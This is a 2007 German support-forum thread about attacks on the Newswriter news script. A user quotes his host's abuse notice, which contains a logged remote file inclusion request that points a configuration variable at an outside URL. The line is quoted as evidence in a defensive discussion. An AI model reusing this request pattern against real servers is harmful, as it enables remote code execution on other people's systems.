Willkommen Gast. Bitte einloggen oder registrieren.
Haben Sie Ihre Aktivierungs E-Mail übersehen?

Einloggen mit Benutzername, Passwort und Sitzungslänge

 
Erweiterte Suche

6931 Beiträge in 1141 Themen- von 586 Mitglieder - Neuestes Mitglied: forrest

21-08-2008, 23:33:18
faqboard.info - SupportforumScriptfragenNewswriter News Management ScriptNewswriter BugsHacker Bug 1.2
« vorheriges nächstes »
Seiten: 1 ... 3 4 [5]   Nach unten
Drucken
Autor Thema: Hacker Bug 1.2  (Gelesen 13738 mal)
Mad Line
Newbie
*
Offline Offline

Beiträge: 14


Profil anzeigen
« Antwort #60 am: 12-10-2007, 13:40:23 »
Moin Moin
Gestern hab ich mal wieder eine mail bekommen von Puretec.

Zitat
wiederum mussten wir einen über Ihre Präenz ausgeführten Angriff auf unseren Webserver registrieren. Erneut war die Software "Newswriter"
Ausgangspunkt, welches das Ausführen beliebigen Codes erlaubt.

Wir möchten Sie nun nochmals bitten sich des Problems anzunehmen und für die Sicherheit der von Ihnen verwendeten Software Sorge zu tragen.

200.126.201.125 - - [11/Oct/2007:07:20:37 +0200] "GET /cgi/newssystem/include/initvars.inc.php?NWCONF_SYSTEM[server_path]=http
://quecagada.bravehost.com/http? HTTP/1.1" 200 15 www.****-****** "Mozilla/3.0 (compatible; Indy Library)" "-"


allso es reicht nicht nur eine umleitung in den zwei dateien werde die umleitung in allen dateien im incude ordner vornehmen.
Gespeichert
basti
Master of Disaster
Administrator
Hero Member
*****
Offline Offline

Beiträge: 2872



Profil anzeigen WWW
« Antwort #61 am: 14-10-2007, 19:47:33 »
Hi,

das ist aber ansich nicht möglich, weil in der initvars.inc.php der Platzhalter $NWCONF_SYSTEM[server_path] gar nicht vor kommt. Also kann der gar nicht aufgerufen bzw. überschrieben werden.
Gespeichert
cu basti

iwebspace.de | Webspaceorder - Bestellsystem für ISP
Seiten: 1 ... 3 4 [5]   Nach oben
Drucken
« vorheriges nächstes »
Gehe zu: